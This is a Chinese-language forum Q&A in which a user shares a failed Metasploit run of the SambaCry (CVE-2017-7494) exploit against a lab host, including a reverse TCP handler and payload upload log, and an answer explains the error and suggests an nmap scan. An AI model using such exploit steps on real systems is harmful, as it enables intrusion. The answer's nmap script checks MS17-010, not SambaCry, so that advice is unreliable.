无法使用Metasploit利用Samba Cry valnurity



我正在尝试利用Linux内核漏洞SAMBA CRY(CVE-2017-7494(使用Metasploit框架进行某些研究工作。但是我会得到以下错误msf exploit(is_known_pipename(> run

[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \192.168.78.139myshare for the 
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to 
\192.168.78.139myshareBsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \PIPE/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path  
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.

是因为我的目标主机是不可交通的还是任何其他问题?我的目标主机具有Samba版本-3.6.23,据我所知

谢谢

无法加载status_object_object_name_not_found表示"找不到对象名称"。可能无法将有效载荷上传到共享文件夹中。您可以尝试执行NMAP并验证漏洞的存在吗?命令是 nmap -p445 --script smb-vuln-ms17-010 TARGET_IP

相关内容

  • 没有找到相关文章

最新更新